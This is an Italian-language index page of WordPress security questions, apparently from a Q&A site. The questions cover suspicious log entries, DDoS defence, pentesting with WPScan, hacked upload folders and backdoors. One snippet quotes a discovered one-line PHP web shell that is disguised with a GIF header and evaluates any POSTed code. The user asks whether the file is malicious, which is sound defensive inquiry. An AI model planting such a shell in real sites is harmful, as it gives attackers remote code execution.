Domande con tag 'wordpress'

domande con tag
1
risposta

I registri dei visitatori mostrano \ x80w \ x01 \ x03 \ x01 l'HNAP1

Qualcuno può dirmi cosa significa? Sono su Bluehost con un server condiviso. [ip]71.63.199.72 [url]HNAP1 [size] 134 [status] 401 [method]GET [protocol] HTTP/1.1 [referring url] My server address [ip]71.63.199.72 [url]401 [size] 0 [status] 0 [...
posta 14.03.2014 - 16:50
1
risposta

Come proteggere un sito Web da DDoS senza un CDN? [chiuso]

Ho una conoscenza di base in Bash e con quella conoscenza ho noleggiato una macchina remota in una piattaforma di hosting gestita principalmente da me (DigitalOcean) e ho creato un ambiente LEMP su cui ho un sito web. Proteggi il mio ambiente...
posta 02.04.2018 - 05:27
1
risposta

l'attacco di malware sul mio sito web potrebbe aver avviato un server SOCKS: si prega di avvisare [duplicato]

Un sito web su cui lavoro volontariamente è stato recentemente uno di quelli colpiti da una vulnerabilità dei plugin per wordpress. Seguendo il consiglio nella risposta a questa domanda , che contiene dettagli dell'attacco, spero che qualc...
posta 06.01.2015 - 00:29
2
risposte

Sicurezza dell'URL di gestione dei contenuti

Gestisco un sito web che è un "cattivo magnete" per i nostri concorrenti. Sto usando Incapsula CDN + WAF e ho proxy interno per la memorizzazione nella cache. CMS / WP dalla sua natura è molto consumante di dati, l'ho verificato, e su ogni p...
posta 08.02.2015 - 12:32
3
risposte

Effettivamente Pentest un sito Wordpress

Quando si parla di pentesting blackbox di un sito Wordpress, la prima cosa che viene in mente è WPScan [http://wpscan.org/]. Durante il pentesting di alcuni siti, ho affrontato un problema comune che mostra che Wordpress SEO 1.14.15 è vulner...
posta 30.03.2014 - 09:10
3
risposte

Questo file PHP contiene un'eval in una variabile POST un'indicazione di compromesso?

Ho trovato questo file sul mio server, contiene il seguente codice: GIF89a <?php eval ($_POST[plm12345plm]); ?> Non c'è altro codice oltre quello sopra. È dannoso?     
posta 04.05.2015 - 23:25
2
risposte

C'è qualche problema di sicurezza nell'host di Wordpress sul server web principale?

Abbiamo ospitato il nostro blog Wordpress su una macchina virtuale Linux e la nostra applicazione web principale su un server IIS. Il nostro sito web è www.mainsite.com e wordpress è su www.blog.mainsite.com. Ora è necessario che il blog appa...
posta 29.12.2014 - 21:11
2
risposte

In che modo l'hacker ha avuto accesso alla mia cartella di caricamento di WordPress? [chiuso]

Ieri ho scoperto che esiste questo link file PHP nel mio server amici. Voglio sapere come è stato l'hacker in grado di caricarlo lì? Ho letto le domande simili ma non ho trovato una risposta corretta. EDIT: - Oggi ho saputo che il sito W...
posta 05.08.2015 - 19:38
1
risposta

Quanto tempo occorre prima di pubblicare una vulnerabilità Web?

Recentemente ho imparato a conoscere wpscan e la sicurezza di WordPress, quindi ho deciso di provarlo con un blog della mia azienda. Di conseguenza ho avuto diverse gravi vulnerabilità che devono essere risolte. Ho avvisato diversi responsabili...
posta 21.11.2018 - 15:50
1
risposta

Come funziona questa backdoor?

Ho appena scoperto che uno dei miei siti web wordpress includeva backdoor (suppongo). Come vedo ora, lo stesso file sul server è diverso rispetto all'originale sulla mia unità portatile. Quindi penso che il mio sito Web sia già infetto. Puoi...
posta 18.11.2017 - 02:00